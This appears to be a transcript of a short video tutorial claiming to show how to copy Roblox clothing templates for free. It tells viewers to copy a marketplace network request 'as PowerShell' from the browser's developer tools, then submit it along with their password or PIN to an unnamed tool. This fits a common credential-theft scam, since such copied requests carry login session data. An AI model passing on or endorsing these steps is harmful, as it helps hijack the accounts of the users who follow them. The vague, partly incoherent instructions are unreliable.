Hi guys, in this video, I'll be showing you how to copy clothes on Roblox for free. Head over to the marketplace and find the clothing you would like to copy. After finding, right-click and press Inspect. Go to the Network tab, press Ctrl+R or press Refresh button. After that, scroll up to the top and find the name of the clothing. Right-click, press Copy, and copy as PowerShell. Press Start now. Enter the file and your password/PIN. Press Submit. After it says Success, there will be the clothing template pop up. Hope you enjoy.